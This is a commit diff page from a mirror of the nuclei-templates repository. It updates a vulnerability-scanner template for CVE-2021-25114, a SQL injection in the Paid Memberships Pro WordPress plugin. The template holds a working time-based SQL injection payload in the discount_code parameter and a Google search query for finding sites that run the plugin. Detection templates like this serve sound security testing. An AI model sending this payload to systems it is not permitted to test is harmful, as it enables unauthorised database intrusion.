daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated metadata and template fix

patch-1
Ritik Chaddha 2023-02-06 19:17:27 +05:30 committed by GitHub
parent 540158b029
commit 56dca2dbe5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
cves/2021/CVE-2021-25114.yaml
View File

@ -14,26 +14,25 @@ info:
cve-id: CVE-2021-25114
metadata:
verified: true
google-query: inurl:"/wp-content/plugins/paid-memberships-pro"
tags: cve,cve2021,wordpress,wp-plugin,wp,sqli,paid-memberships-pro
requests:
- raw:
- |
GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 15s
GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
- |
GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- duration_2>=6
- contains(all_headers_2, "application/json")
- duration_1>=6
- contains(all_headers_1, "application/json")
- status_code == 200
- contains(body_1, 'other_discount_code_a')
condition: and
- contains(body_2, 'other_discount_code_')
condition: and